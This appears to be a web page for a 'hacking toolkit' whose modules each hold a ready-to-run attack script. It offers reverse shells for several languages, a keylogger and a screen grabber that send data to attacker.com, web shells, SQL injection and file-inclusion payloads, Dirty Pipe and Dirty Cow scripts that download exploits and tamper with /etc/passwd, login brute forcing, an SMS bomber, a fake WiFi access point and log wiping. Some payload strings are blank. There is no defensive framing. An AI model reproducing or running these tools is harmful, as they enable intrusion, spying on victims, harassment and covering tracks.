๐ก RECONNAISSANCE MODULE
Network scanning, subdomain enumeration, port scanning & more
Subdomain Enumerator
Find all subdomains of target domain
#!/bin/bash
# Subdomain enumeration
subfinder -d target.com
amass enum -d target.com
sublist3r -d target.com
โณ Ready to scan...
Port Scanner Pro
Scan all open ports on target
#!/bin/bash
# Port scanning
nmap -sS -sV -p- target.com
masscan target.com -p1-65535 --rate=10000
rustscan -a target.com -r 1-65535
โณ Ready to scan...
Admin Panel Finder
Find admin login panels
#!/usr/bin/env python3
import requests
target = "target.com"
panels = ['admin','login','wp-admin','administrator','panel','dashboard','backend']
for panel in panels:
url = f"http://{target}/{panel}"
try:
r = requests.get(url, timeout=3)
if r.status_code == 200:
print(f"[+] Found: {url}")
except: pass
โณ Ready to find...
DNS Enumeration
Enumerate all DNS records
#!/bin/bash
# DNS enumeration
dnsrecon -d target.com
fierce --domain target.com
dnsenum target.com
dig target.com ANY
โณ Ready to enumerate...
๐ WEB HACKING MODULE
SQL Injection, XSS, LFI/RFI, Web Shells & more
SQLi Auto Exploit
Automatic SQL injection exploitation
#!/usr/bin/env python3
import requests
url = "http://target.com/page?id=1"
payloads = ["' OR '1'='1", "' UNION SELECT 1,2,3,4,5 -- -"]
for payload in payloads:
test_url = f"{url}{payload}"
r = requests.get(test_url)
if "error" not in r.text.lower():
print(f"[+] Vulnerable: {test_url}")
โณ Ready to exploit...
XSS Hunter
Find XSS vulnerabilities
#!/usr/bin/env python3
import requests
payloads = [
'',
'
',
'">'
]
for payload in payloads:
test_url = f"http://target.com/search?q={payload}"
r = requests.get(test_url)
if payload in r.text:
print(f"[+] XSS Found: {payload}")
โณ Ready to hunt...
LFI/RFI Scanner
Local/Remote file inclusion scanner
#!/usr/bin/env python3
import requests
lfi_payloads = [
'../../../../etc/passwd',
'../../../../etc/shadow',
'/etc/passwd',
'/proc/self/environ'
]
for payload in lfi_payloads:
url = f"http://target.com/page?file={payload}"
r = requests.get(url)
if 'root:' in r.text:
print(f"[+] LFI Found: {url}")
โณ Ready to scan...
Web Shell Generator
Generate various web shells
#!/usr/bin/env python3
shells = {
'php': '',
'asp': '<% eval request("cmd") %>',
'jsp': '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>'
}
for lang, code in shells.items():
print(f"[+] {lang} shell generated:")
print(code)
โณ Ready to generate...
๐ CRACKING MODULE
Password generation, hash cracking, wordlist & brute force
Password Generator
Generate strong secure passwords
#!/usr/bin/env python3
import random, string
def generate_password(length=16):
chars = string.ascii_letters + string.digits + "!@#$%^&*()"
return ''.join(random.choice(chars) for _ in range(length))
print(f"Password: {generate_password(20)}")
โณ Ready to generate...
Hash Cracker
Crack MD5, SHA1, SHA256 hashes
#!/usr/bin/env python3
import hashlib
def crack_md5(target_hash, wordlist):
with open(wordlist, 'r') as f:
for word in f.read().splitlines():
if hashlib.md5(word.encode()).hexdigest() == target_hash:
return word
return None
โณ Ready to crack...
Wordlist Generator
Generate custom wordlists
#!/usr/bin/env python3
base_words = ['admin','root','password','123456']
words = set()
for word in base_words:
words.add(word)
words.add(word.capitalize())
for i in range(10):
words.add(word + str(i))
with open('wordlist.txt', 'w') as f:
for w in sorted(words):
f.write(w + '\n')
print(f"[+] Generated {len(words)} words")
โณ Ready to generate...
Brute Forcer
Brute force login with wordlist
#!/usr/bin/env python3
import requests
target = "http://target.com/login"
wordlist = "passwords.txt"
def try_login(password):
data = {'username':'admin','password':password}
r = requests.post(target, data=data)
if 'Login success' in r.text:
print(f"[+] Found: {password}")
with open(wordlist) as f:
for password in f.read().splitlines():
try_login(password)
โณ Ready to brute...
๐ RAT MODULE
Remote Access Trojan, Reverse Shell, Keylogger & more
Python RAT Server
Full featured RAT server
#!/usr/bin/env python3
import socket, threading, subprocess, os
class RatServer:
def __init__(self, port=4444):
self.port = port
self.clients = []
def start(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('0.0.0.0', self.port))
s.listen(5)
print(f"[+] RAT Server on port {self.port}")
while True:
client, addr = s.accept()
print(f"[+] Client from {addr}")
threading.Thread(target=self.handle, args=(client,)).start()
โณ Ready to start RAT...
Reverse Shell Generator
Generate reverse shell for all languages
#!/bin/bash
IP="YOUR_IP"
PORT="4444"
echo "BASH: bash -i >& /dev/tcp/$IP/$PORT 0>&1"
echo "PYTHON: python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"$IP\",$PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call([\"/bin/sh\",\"-i\"])'"
echo "PHP: php -r '\$s=fsockopen(\"$IP\",$PORT);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
echo "PERL: perl -e 'use Socket;\$i=\"$IP\";\$p=$PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
โณ Ready to generate...
Keylogger Pro
Record all keystrokes
#!/usr/bin/env python3
import keyboard, threading, requests, time
log = ""
def on_press(event):
global log
log += event.name
def send_logs():
global log
while True:
time.sleep(30)
if log:
requests.post("http://attacker.com/log", data={"logs": log})
log = ""
keyboard.on_press(on_press)
threading.Thread(target=send_logs, daemon=True).start()
keyboard.wait()
โณ Ready to keylog...
Screen Recorder
Record victim screen remotely
#!/usr/bin/env python3
import pyautogui, requests, io
from PIL import Image
def capture_screen():
screenshot = pyautogui.screenshot()
img_bytes = io.BytesIO()
screenshot.save(img_bytes, format='PNG')
requests.post("http://attacker.com/screenshot", files={'screenshot': img_bytes.getvalue()})
capture_screen()
โณ Ready to capture...
๐ก๏ธ PRIVILEGE ESCALATION MODULE
SUID finder, CVE scanner, Dirty Pipe, Dirty Cow & more
SUID Finder
Find SUID binaries for privilege escalation
#!/bin/bash
# SUID Finder
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
find / -perm -6000 -type f 2>/dev/null
# Check for known SUID exploits
for bin in $(find / -perm -4000 -type f 2>/dev/null); do
echo "[*] $bin"
strings $bin | grep -E "cp|mv|chmod|chown|find|python|perl|bash|sh" 2>/dev/null
done
โณ Ready to find...
CVE Scanner Pro
Scan kernel for known CVEs
#!/bin/bash
KERNEL=$(uname -r)
echo "[+] Kernel: $KERNEL"
if [[ "$KERNEL" =~ "5.[0-9]" ]] || [[ "$KERNEL" =~ "6.[0-8]" ]]; then
echo "โ ๏ธ VULNERABLE TO CVE-2024-1086"
fi
if [[ "$KERNEL" =~ "5.[8-9]" ]] || [[ "$KERNEL" =~ "5.1[0-6]" ]]; then
echo "โ ๏ธ VULNERABLE TO CVE-2022-0847 (Dirty Pipe)"
fi
if [[ "$KERNEL" =~ "2.[6-9]" ]] || [[ "$KERNEL" =~ "3.[0-9]" ]] || [[ "$KERNEL" =~ "4.[0-8]" ]]; then
echo "โ ๏ธ VULNERABLE TO CVE-2016-5195 (Dirty Cow)"
fi
โณ Ready to scan...
Dirty Pipe Auto
Auto download & run Dirty Pipe
#!/bin/bash
wget https://raw.githubusercontent.com/lyx/dirtypipe/main/dirtypipe.c
gcc -o dirtypipe dirtypipe.c
./dirtypipe /etc/passwd "root::0:0:root:/root:/bin/bash"
echo "โ
Check: cat /etc/passwd | grep 'root::0'"
โณ Ready to exploit...
Dirty Cow Auto
Auto download & run Dirty Cow
#!/bin/bash
wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
gcc -pthread dirty.c -o dirty
./dirty root
echo "โ
Root created! Password: root"
โณ Ready to exploit...
๐ OSINT MODULE
Email hunter, username checker, IP tracker & social media scraper
Email Hunter
Find email addresses from domain
#!/usr/bin/env python3
import requests, re
domain = "target.com"
url = f"https://api.hunter.io/v2/domain-search?domain={domain}&api_key=YOUR_KEY"
r = requests.get(url)
emails = re.findall(r'[\w\.-]+@[\w\.-]+\.\w+', r.text)
for email in emails:
print(f"[+] {email}")
โณ Ready to hunt...
Username Checker
Check username across social media
#!/usr/bin/env python3
import requests
username = "username"
sites = {
'github': f'https://github.com/{username}',
'twitter': f'https://twitter.com/{username}',
'instagram': f'https://instagram.com/{username}',
'reddit': f'https://reddit.com/user/{username}'
}
for site, url in sites.items():
r = requests.get(url)
if r.status_code == 200:
print(f"[+] {site}: https://{site}.com/{username}")
โณ Ready to check...
IP Tracker
Track IP location
#!/bin/bash
curl -s http://ip-api.com/json/8.8.8.8
# atau
curl -s https://ipinfo.io/8.8.8.8
โณ Ready to track...
GitHub Dorker
Search GitHub for secrets
#!/usr/bin/env python3
import requests
search = 'password'
url = f'https://api.github.com/search/code?q={search}+in:file'
r = requests.get(url, headers={'Authorization': 'token GITHUB_TOKEN'})
for item in r.json().get('items', []):
print(f"[+] {item['html_url']}")
โณ Ready to dork...
๐ฑ MOBILE MODULE
Android RAT, SMS Bomber, WiFi Phisher & more
Android RAT
Remote Access Trojan for Android
#!/usr/bin/env python3
import subprocess
def install_apk(apk_path):
subprocess.run(['adb', 'install', apk_path])
def start_rat():
subprocess.run(['adb', 'shell', 'am', 'start', '-n', 'com.rat/.MainActivity'])
def adb_reverse_shell(ip, port):
subprocess.run(['adb', 'shell', f'nc -e /system/bin/sh {ip} {port}'])
โณ Ready to deploy...
SMS Bomber
Send multiple SMS
#!/usr/bin/env python3
import requests, threading
number = "08123456789"
def send_sms():
url = f"https://api.smsprovider.com/send?to={number}&msg=Hacked"
requests.post(url)
for _ in range(100):
threading.Thread(target=send_sms).start()
โณ Ready to bomb...
WiFi Phisher
Create fake WiFi AP
#!/bin/bash
airmon-ng start wlan0
airbase-ng -e "Free_WiFi" -c 6 wlan0mon
echo "interface at0" > /etc/dhcp/dhcpd.conf
echo "subnet 192.168.1.0 netmask 255.255.255.0 {" >> /etc/dhcp/dhcpd.conf
echo "range 192.168.1.10 192.168.1.100;" >> /etc/dhcp/dhcpd.conf
echo "}" >> /etc/dhcp/dhcpd.conf
service dhcpd start
python3 -m http.server 80
โณ Ready to phish...
๐ง UTILITY MODULE
Log cleaner, SSH tunneler, proxy rotator & more
Log Cleaner
Clean system logs
#!/bin/bash
cat /dev/null > /var/log/auth.log
cat /dev/null > /var/log/syslog
cat /dev/null > /var/log/messages
cat /dev/null > /var/log/secure
cat /dev/null > /var/log/maillog
cat /dev/null > /var/log/cron
cat /dev/null > ~/.bash_history
history -c
echo "โ
Logs cleaned!"
โณ Ready to clean...
SSH Tunneler
Create SSH tunnels
#!/bin/bash
# Local port forwarding
ssh -L 8080:localhost:80 user@server
# Remote port forwarding
ssh -R 4444:localhost:22 user@server
# Dynamic SOCKS proxy
ssh -D 1080 user@server
โณ Ready to tunnel...
Proxy Rotator
Rotate proxies automatically
#!/usr/bin/env python3
import requests, random, time
proxies = [
'http://proxy1:8080',
'http://proxy2:8080',
'http://proxy3:8080'
]
def rotate_proxy():
return {'http': random.choice(proxies)}
for _ in range(10):
r = requests.get('http://target.com', proxies=rotate_proxy())
time.sleep(2)
โณ Ready to rotate...
File Encryptor
Encrypt/Decrypt files
#!/usr/bin/env python3
from cryptography.fernet import Fernet
key = Fernet.generate_key()
cipher = Fernet(key)
def encrypt_file(file):
with open(file, 'rb') as f:
data = f.read()
encrypted = cipher.encrypt(data)
with open(file + '.enc', 'wb') as f:
f.write(encrypted)
print(f"[+] Encrypted: {file}")
def decrypt_file(file):
with open(file, 'rb') as f:
data = f.read()
decrypted = cipher.decrypt(data)
with open(file.replace('.enc', ''), 'wb') as f:
f.write(decrypted)
print(f"[+] Decrypted: {file}")
โณ Ready to encrypt...